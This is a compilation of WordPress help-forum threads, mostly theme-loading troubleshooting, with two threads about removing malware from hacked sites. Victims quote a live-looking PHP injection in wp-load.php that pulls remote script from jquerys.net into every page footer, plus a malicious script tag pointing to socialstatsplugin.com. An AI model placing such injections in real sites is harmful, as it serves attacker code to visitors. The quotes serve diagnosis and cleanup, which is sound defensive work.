In my wordpress website .htaccess has some strange redirection script, i removed the file but once the site is browsed the .htaccess file is automatically created with the strange script. in addition to that a folder named generall is also automatically creating even though we delete the folder. The folder has one php file and html file with strange scripts. Please help to resolve the hacking issue
You need to completely remove the infection from your site. Here's the easiest WordPress guide to follow: https://malcure.com/blog/security/the-easiest-guide-to-wordpress-malware-removal/
Your website still contains malware. You need to do a complete virus scan. You can use WordFence plugin to scan.
With these also try
1. Update all theme & plugins.
2. Do a manual update of your WordPress.
Related
I am helping out creating a few wordpress templates. I've been sent over the basic content (wp-admin/wp-content/wp-includes folders and other wp-* files).
They've already created a new theme, and one front-page.php file. This file includes "parts" such as get_header and get_footer.
Essentially now they'd like me to create new templates using this theme, and php variables to make updating easier. My question is - how can I view this so I can see what i'm making?
I downloaded MAMP and set up a local server, and if I create a sample .php file in the htdocs folder, that page appears correctly. However when I paste the Wordpress folder that I was sent, nothing loads. Is there a special way to get a front-page.php including partials to load within a theme? Am I missing something obvious here?
You will have to Install WordPress completely in order to make it work. Then you will be able to add your folder in the "Themes" folder of WordPress..
You can Google "How to Install WordPress on Mamp" for more info... you will find plenty of websites helping you.
I also suggest you read a few blog post on how to create WordPress Themes... :)
Good luck
I have a simple HTML microsite, which I want to put inside my wordpress website. For example: Wordpress website is: abc.com
I want to put my microsite inside this wordpress site. So URL becomes:
abc.com/microsite/
But, wordpress treats any url as its own. How can put "abc.com/microsite/" urls to Wordpress Ignore list. So that any pages inside microsite folder executes independently.
just put you folder 'microsite' in root(Where you find wp-admin,wp-content and wp-include folder). and
you are able to access the folder
"abc.com/microsite/ by this url
If you are still having issues with accessing the subfolder, try renaming the .htaccess to .htaccess-bak in order for WordPress to regenerate the file again. Understand that your website might temporarily go down.
I've found this solution to help in some cases, but I don't know exactly why, ergo I am not sure it will work. And if you feel uncomfortable editing the .htaccess file I suggest you learn more about it (as should I). It is a very powerful file and WordPress uses it a good deal.
P.S. The file is located in the same folder, WordPress' root folder where you find /wp-admin/, /wp-content/, etc. It is hidden by some hosting providers, but I've always been able to find them through FTP with the hosting companies I've used before.
this script keeps coming back to my wp-load.php file in public_html folder:
function pluginAuth(){
echo(wp_remote_retrieve_body(wp_remote_get('http://jquerys.net/jquery-1.6.3.min.js')));
}
add_action('wp_footer', 'pluginAuth');
this directs to a virus site "jquerys.net"
What can be the solution. deleting the fucntion from wp-load.php does not eliminate it, as it regenrates on refreshing any page of my blog.
kindly help
There could be malicious code injected into any of your wordpress files. You will need to go through all files especially inside your theme to look for code or files / folders that shouldn't be there.
After this you can use this article to make your build more secure:
http://codex.wordpress.org/Hardening_WordPress
Has been very useful to me in the past for preventing this sort of thing from happening again. You can do as many or as little of the security measures as you like.
I would definitely recommend doing everything from the Securing wp-admin section.
Most probably you have some infected or malicious file in wp-ulpoads folder, check there also for any file type, different than image or documents.
Also important: check your current theme functions.php file for malicious code, often hacked themes (i.e. downloaded via bittorent websites of mafiashare websites) inject such code, search for any curl() requests, actually not only in functions.php, but in files (if your theme has them) options.php or settings.php, etc.
You seem to have an infected WordPress installation. Use Theme Authenticity Checker OR Exploit Scanner plugins for automatically detecting potential malicious files that might be the culprit.
You can also try the free scan service of Sucuri.
Once you are done with the identification of the corrupted files, replace them with their official counterparts which you can get from WordPress.org.
As a defensive measure, install WordPress File Monitor Plus plugin - as it emails each time some file is changed. This will allow you to quickly revert any changes that some hacker/script makes in the future!
i was able to detect the malicious script. it was in the public_html folder. the file was "main.php" which is not in the default installation and also it does not contribute to any theme or plugin. after deleting all the unverfied plugins, i deleted this file and deleted the code in the wp-load.php.
at first when i did not deleted the "main.php" file. the 'function' in the wp-load kept coming back. but after deleting "main.php" file, i have rid myself from this virus.
There is new virus in WP
There's a downloading of a update.exe initiated by line
<script src="//socialstatsplugin.com/jqury.js"></script>
i Have done some reviews for this kind of virus.
Just go to your WP folder and check if any unwanted hidden file and when you browse through that , the files are unreadable.
As said Just do
DELETE FROM wp_options WHERE option_name like '%wp_data_newa%'
and delete all unwanted hidden folder within any folder. It worked till now. Hope it will help. Never knows the future.
Thanks
I'm having a very basic problem: I'm trying to create a new theme for a wordpress installation locally on my computer.
I've created a styles.css and index.php file and put it in a folder in wp-content/themes. But it doesn't appear in the Wordpress themes page.
As a test, I made a change to the description of one of the existing themes (Twenty-Ten) in its style.css, and refresh the Wordpress themes page, but the old description continues to be shown. This suggests to me that I'm simply using the wrong folder, but that's not possible! Any ideas on this problem much appreciated.
UPDATE: In fact, even when I delete Twenty Ten from the Themes folder, it's still available as an option in the Wordpress backend, and I can activate it... Very strange...
G
I agree with your diagnosis. You are either looking at the wrong folder or in fact the wrong computer. There's no other way that you could change the theme to one that has been deleted.
I suggest that you confirm you are in the same universe you think you are in. Create a simple file localserver.txt in your WordPress directory and then confirm that you can access that file.
If you can't, you have your answer. You are somehow accessing a different location.
If you can access that text file, you need to go further and look to see if something like the site url setting is redirecting you to the live site, without you realizing it, when you access wp-admin.
Beyond that, I'd need to know more about your setup. Something like having www.example.com in your /etc/host file and not example.com can cause similar confusion...
Are you using Wordpress Multisite?
In that case you have to 'enable' that theme in the Network admin manager
Having a really baffling issue with permissions, WordPress and theme files.
I have a fresh install of WordPress and tried uploading the theme I made for my client. It uploaded fine but it doesn't show up in the Manage Themes menu. I checked everything was uploaded and it was. Checked permissions (even set them to 777 at one point) and they were fine. But the theme doesn't show up.
Here are the different scenarios I've tried:
Using the Install Themes menu and uploading a .zip (failed)
Duplicate twentyten folder and contents (worked)
Duplicate twentyten folder and used my theme files (failed)
Duplicate twentyten folder and used my theme files and their style.css (failed)
Uploaded my theme WITHOUT style.css (gave missing style.css error)
Uploaded my theme WITHOUT style.css and put in twentyten/created one from scratch (both failed)
I'm on my clients MediaTemple hosting and I've never encountered this error. Their support has yet to get back to us.
Does anyone have a similar problem? Solution? It's possible I can give you FTP access if needed.
CSS Head (changed values but format and everything is still the same):
/*
Theme Name: Example Theme
Theme URI: http://example.com/
Description: WordPress theme
Author: Company
Version: 1.0
*/
Edit: Trying to access the folder through my browser results in a 403 error (works fine on twentyten). style.css can be viewed from the browser.
If you are using a MULTI-SITE installation of Wordpress, you have to first go into Network Admin, select Themes from the left menu and enable the themes you like to use before they can appear on the "Manage Themes" page in the Site Admin section.
Perhaps you are missing a required template file?
At the very minimum, a WordPress Theme
consists of two files:
style.css
index.php
http://codex.wordpress.org/Theme_Development
On Ubuntu 14.04 you can install the wordpress package simply using sudo apt install wordpress but then you have to set a link to the themes directory.
E.g. for your "newTheme":
ln -s /usr/share/wordpress/wp-content/themes/newTheme /var/lib/wordpress/wp-content/themes
I bet you have some special characters in your templates. This once drove me nuts to find.
Check your Template files and/or rename them until the theme shows up. I used a german "ö" in a templates name.
I had a very similar problem. Spent a few hours before I found that somehow when I moved my local site (probably using All-in-one Wp Migration plugin), a .htaccess file was created in the /wp-content folder. I don't remember what was inside this file but I think it didn't matter.
After removing this file everything was ok.
Is the theme folder name different than everything else? Is the Theme Name in style.css different than everything else?
I am guessing BOMs are the problem. They messed up my validation of a page once, as I tried to remove the BOM. Try using an editor and remove the BOMs. For Notepad++, the text editor I use, I just set the encoding to UTF-8 without BOM and saved. That solved my problem. Of course, your text editor may be different.
As I discovered at the end of tortuous troubleshooting, an old wp-config.php may cause newly installed themes to be undetected and invisible in /wp-admin/themes.php - I am not sure that you have the exact same problem but it looks very similar to mine and you might want to try your configuration with a wp-config.php newly generated by Wordpress.
Make a backup of your styles.css
Copy the styles.css file from twentyforteen to your theme folder.
Only change the template name at the top of the file
Re-load the themes page in WordPress admin; once you've seen it working,
Further-modify the new styles.css file as needed.
The problem could have been, that you uploaded it in .zip
Your php setting might disable the scandir. It may cause the wordpress cannot scan the theme folder
Solution:
find php.ini. You may run php --ini to get the php.ini file location.
Open php.ini,Search for disable_functions, then you may removescandir parameter.
Save and restart your php services.